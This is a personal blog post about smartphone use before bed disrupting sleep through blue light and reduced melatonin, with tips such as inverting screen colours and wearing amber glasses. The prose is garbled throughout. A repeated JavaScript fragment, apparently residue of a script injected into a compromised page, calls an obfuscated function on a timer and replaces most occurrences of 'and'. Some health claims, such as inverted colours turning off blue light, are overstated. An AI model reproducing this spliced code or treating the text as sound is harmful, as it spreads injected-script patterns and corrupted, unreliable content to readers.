Is Your Cell Phone Destroying Your SleepSix months ago I upgraded to an iPhone 6. I was so happy to have a bigger screen, faster connection, andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and all the perks that came with my new phone. Unfortunately the ease of this new phone allowed me to form the habit of using it before bedtime. After months of checking Facebook, reading articles, andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and surfing the web before bedtime, I stated to notice that for the first time in my life I was having a very restless night’s sleep.

Could it be that my precious new iPhone was the cause of my disturbed sleep? Well, I started to research the effects of cell phones on our sleep patterns andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and I found a ton of information on how harmful our cell phones are for a good night sleep. Here’s what I found:

The blue light that is emitted from our phones lowers melatonin production in our body. Melatonin is a hormone that our body secretes when the sun goes down. It tells our bodies it’s time to rest andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and repair. You need a significant amount of melatonin in your bloodstream to make you sleepy. The blue light that comes from our phones stops the production of melatonin. Our bodies then don’t know that it’s time to repair. The more exposure we have to this blue light, whether it’s a cell phone, ipad, or computer, the less melatonin there is in our body when we sleep. Our bodies go through 6-7 REM cycles per night. The more REM sleep we get, the more rested we will feel the next day. This blue light andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and lack of melatonin destroys the amount of REM cycles we enter.

Good news though, there are ways to minimize this blue light. First, you can invert the colors. Go to your settings, general, accessibility, andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and under vision you will see invert colors. This will turn off the blue light andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and make your screen black andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and the words white. They also make amber glasses you can wear if you have to be on your laptop or ipad for long periods before bed. Go to Amazon to find those. Lastly, you can just turn off your phone from 8pm to 8am. This will assure that you get a great nights sleep.  For me, I think it’s time to take a break from the phone andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and get a good nights sleep.
